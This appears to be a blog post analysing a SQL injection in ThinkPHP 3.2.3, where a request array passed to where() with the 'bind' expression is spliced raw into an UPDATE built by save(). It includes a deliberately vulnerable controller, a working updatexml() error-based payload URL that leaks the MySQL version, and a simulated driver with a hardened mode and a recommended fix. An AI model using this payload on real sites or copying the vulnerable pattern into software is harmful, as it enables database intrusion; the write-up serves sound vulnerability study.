Continuing from the previous post: https://www.cnblogs.com/cuocuo/p/14329868.html

When exp is bind, the where condition is still concatenated (the bind branch of parseWhereItem in Think\Db\Driver emits `key = :` followed verbatim by whatever we supply), but with find() and select() this cannot be exploited: those queries have no SET clause, so nothing is ever bound, and the placeholder the expression produces is rejected when the statement is prepared. save() does bind its SET values, so we need to change the code a bit:
<?php
namespace Home\Controller;
use Think\Controller;
use \Think\Logs;
class IndexController extends Controller {
    public function index(){
        $User = M("user");
        $user['Id'] = I('id');      // where condition taken straight from the request (array => expression)
        $data['pwd'] = I('pwd');    // SET value: save() binds it as the placeholder :0
        $value = $User->where($user)->save($data);
        var_dump($value);
    }
}
http://127.0.0.1/?id[0]=bind&id[1]=123&pwd=cuocuo
Stepping into $this->execute() (Think\Db\Driver), the bound values are spliced into the logged query string:

$this->queryStr = strtr($this->queryStr,array_map(function($val) use($that){ return '\''.$that->escapeString($val).'\''; },$this->bind));
As you can see, :0 has already been replaced by cuocuo: the only entry in $this->bind is :0 => 'cuocuo', created by parseSet for the pwd column, and strtr replaces every occurrence of each key. The :123 that follows stays as it is because nothing was bound under that name, and the same rule applies when the statement is actually prepared: an unbound placeholder makes the PDO execute fail. If we change it to :0, it satisfies the replacement condition as well. Everything after the placeholder name is raw SQL from the where concatenation, so the statement now runs:

http://127.0.0.1/?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)&pwd=cuocuo

With an empty table prefix the resulting statement is roughly:

UPDATE user SET pwd='cuocuo' WHERE Id = 'cuocuo' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

The updatexml() call raises a MySQL error whose message carries the selected value, which is how the version string comes back.
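To make the three requests comparable without a database, here is an added example written for this post; it is not code from the original post and not ThinkPHP's own source. It is a cut-down PHP re-implementation of the driver steps involved (the bind branch of parseWhereItem, parseSet, and the strtr() from execute()); the method names match ThinkPHP 3.2.3 but the bodies are simplified assumptions, the table prefix is assumed empty, and the unbound-placeholder check stands in for the PDO error. The `strict` mode is this example's own mitigation, not an upstream patch.

```php
<?php
// Added example for this post, not ThinkPHP's code: a cut-down re-implementation of
// the Think\Db\Driver steps discussed (parseWhereItem 'bind' branch, parseSet, and
// the strtr() in execute()). Method names match 3.2.3; bodies are simplified assumptions.
class MiniDriver
{
    /** @var array bound values keyed ':name', like Driver::$bind */
    private $bind = array();
    /** @var bool hardened mode (this example's own mitigation, not an upstream fix) */
    private $strict;

    public function __construct($strict = false)
    {
        $this->strict = $strict;
    }

    public function escapeString($str)
    {
        return addslashes($str);
    }

    private function bindParam($name, $value)
    {
        $this->bind[':' . $name] = $value;
    }

    // 'bind' branch of parseWhereItem(): $val[1] is appended verbatim after ':'.
    // Anything after the placeholder name is raw SQL, so this is the injection point.
    private function parseWhereItem($key, array $val)
    {
        if ('bind' != strtolower($val[0])) {
            throw new InvalidArgumentException('only the bind expression is modelled');
        }
        if ($this->strict) {
            // Accept only a bare placeholder name that parseSet() has already bound.
            if (!preg_match('/^[A-Za-z0-9_]+$/', $val[1]) || !isset($this->bind[':' . $val[1]])) {
                throw new InvalidArgumentException('bind: unknown or malformed placeholder');
            }
        }
        return $key . ' = :' . $val[1];
    }

    // parseSet(): each scalar SET value gets a fresh numbered placeholder (:0, :1, ...)
    // plus an entry in $this->bind. A SELECT has no SET, so it binds nothing.
    private function parseSet(array $data)
    {
        $set = array();
        foreach ($data as $key => $val) {
            $name  = count($this->bind);
            $set[] = $key . '=:' . $name;
            $this->bindParam($name, $val);
        }
        return ' SET ' . implode(',', $set);
    }

    private function parseWhere(array $where)
    {
        $items = array();
        foreach ($where as $key => $val) {
            $items[] = $this->parseWhereItem($key, $val);
        }
        return ' WHERE ' . implode(' AND ', $items);
    }

    // Placeholders in the statement with no entry in $this->bind: PDO refuses to
    // execute while any remain (the reason find()/select() cannot be exploited).
    private function unboundPlaceholders($sql)
    {
        preg_match_all('/:[A-Za-z0-9_]+/', $sql, $m);
        return array_values(array_diff(array_unique($m[0]), array_keys($this->bind)));
    }

    // The strtr() from execute(): every bound name is replaced, wherever it occurs,
    // by its quoted and escaped value.
    private function substitute($sql)
    {
        if (empty($this->bind)) {
            return $sql;
        }
        return strtr($sql, array_map(function ($val) {
            return '\'' . $this->escapeString($val) . '\'';
        }, $this->bind));
    }

    // $data === null models find()/select(); an array models save().
    public function build($table, array $where, $data = null)
    {
        $this->bind = array();
        $sql = is_array($data)
            ? 'UPDATE ' . $table . $this->parseSet($data)   // SET is parsed before WHERE, as in the driver
            : 'SELECT * FROM ' . $table;
        $sql .= $this->parseWhere($where);
        return array('sql' => $sql, 'unbound' => $this->unboundPlaceholders($sql), 'final' => $this->substitute($sql));
    }
}

// Constructed inputs mirroring the post's three requests (table prefix assumed empty).
$payload = '0 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)';
$driver  = new MiniDriver();
$cases = array(
    'select, bind 123'     => $driver->build('user', array('Id' => array('bind', '123'))),
    'save,   bind 123'     => $driver->build('user', array('Id' => array('bind', '123')), array('pwd' => 'cuocuo')),
    'save,   bind payload' => $driver->build('user', array('Id' => array('bind', $payload)), array('pwd' => 'cuocuo')),
);
foreach ($cases as $label => $r) {
    echo $label, "\n  raw:     ", $r['sql'], "\n  unbound: ",
        $r['unbound'] ? implode(',', $r['unbound']) : '(none)', "\n  final:   ", $r['final'], "\n";
}

// The hardened variant rejects the payload before any SQL is assembled.
try {
    $strict = new MiniDriver(true);
    $strict->build('user', array('Id' => array('bind', $payload)), array('pwd' => 'cuocuo'));
} catch (InvalidArgumentException $e) {
    echo "strict: ", $e->getMessage(), "\n";
}
```

Run it with `php` on the command line. The first two cases each leave :123 unbound, which is the condition that stops the query; the third reuses :0 and shows the same substituted statement the post describes. The real fix belongs in the controller anyway: never hand a request array to where() as an expression; cast or whitelist the value (for example intval) before it reaches the model.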